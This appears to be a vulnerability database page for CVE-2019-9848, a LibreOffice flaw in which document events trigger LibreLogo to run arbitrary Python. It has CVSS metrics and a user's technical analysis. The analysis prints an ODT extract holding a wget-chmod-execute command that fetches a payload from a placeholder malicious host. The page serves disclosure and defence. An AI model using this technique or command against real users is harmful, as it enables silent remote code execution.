Attacker Value
Very Low
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
0

CVE-2019-9848

Disclosure Date: July 17, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

LibreOffice has a feature where documents can specify that pre-installed scripts can be executed on various document events such as mouse-over, etc. LibreOffice is typically also bundled with LibreLogo, a programmable turtle vector graphics script, which can be manipulated into executing arbitrary python commands. By using the document event feature to trigger LibreLogo to execute python contained within a document a malicious document could be constructed which would execute arbitrary python commands silently without warning. In the fixed versions, LibreLogo cannot be called from a document event handler. This issue affects: Document Foundation LibreOffice versions prior to 6.2.5.

Add Assessment

1
Ratings
  • Attacker Value
    Very Low
  • Exploitability
    Medium
Technical Analysis

This forms the basis of a social engineering attack, It requires libre office and python installed. This means it is a limited pool of targe victims. However this is a common setup on Linux desktop environments which may make developers a target.

To exploit this vulnerability, an attacker creates a document with a text-written command and a hyperlink that, upon user mouseover, runs a program through the LibreLogo extension. When a user loads up the document in a program such as LibreOffice Writer, the macro is enabled automatically.

The hyperlink is set to include the macro LibreLogo:run. This in turn runs the previous text command through LibreLogo as if it’s attempting to use the information to create turtle vector graphics. This causes whatever is being called in the text command to run – be it malware, a program, or a malicious file download.

An example extract from an odt file can be seen below

   <txt ptr="0x4e9a180" id="3" symbol="11SwTextFrame" next="10" upper="2" txtNodeIndex="9">
    <infos>
     <bounds left="8181" top="1418" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
import os    <Text nLength="9" nType="POR_PARA" nHeight="299" nWidth="989" Portion="import os"/>
    <LineBreak nWidth="989" Line="import os"/>
    <Finish/>
   </txt>
   <txt ptr="0x7c6e450" id="10" symbol="11SwTextFrame" next="15" prev="3" upper="2" txtNodeIndex="10">
    <infos>
     <bounds left="8181" top="1717" width="9638" height="598" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="598"/>
    </infos>
os.system(“wget http://immersivemalware.bad:8001/payload.sh ; chmod +x payload.sh ; ./payload.sh”)    <Text nLength="84" nType="POR_PARA" nHeight="299" nWidth="9264" Portion="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <LineBreak nWidth="9264" Line="os.system(&#x201C;wget http://malware.bad:8001/payload.sh ; chmod +x payload.sh ; "/>
    <Text nLength="14" nType="POR_LAY" nHeight="299" nWidth="1458" Portion="./payload.sh&#x201D;)"/>
    <LineBreak nWidth="1458" Line="./payload.sh&#x201D;)"/>
    <Finish/>
   </txt>
   <txt ptr="0x4e2ac00" id="15" symbol="11SwTextFrame" prev="10" upper="2" txtNodeIndex="11">
    <infos>
     <bounds left="8181" top="2315" width="9638" height="299" mbFixSize="false" mbValidPos="true" mbValidSize="true" mbValidPrtArea="true"/>
     <prtBounds left="0" top="0" width="9638" height="299"/>
    </infos>
Run    <Text nLength="3" nType="POR_PARA" nHeight="299" nWidth="434" Portion="Run"/>
    <LineBreak nWidth="434" Line="Run"/>
    <Finish/>
   </txt>
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • canonical,
  • debian,
  • fedoraproject,
  • libreoffice,
  • opensuse

Products

  • debian linux 8.0,
  • fedora 29,
  • fedora 30,
  • leap 15.0,
  • leap 15.1,
  • libreoffice,
  • ubuntu linux 16.04,
  • ubuntu linux 18.04,
  • ubuntu linux 19.04
Technical Analysis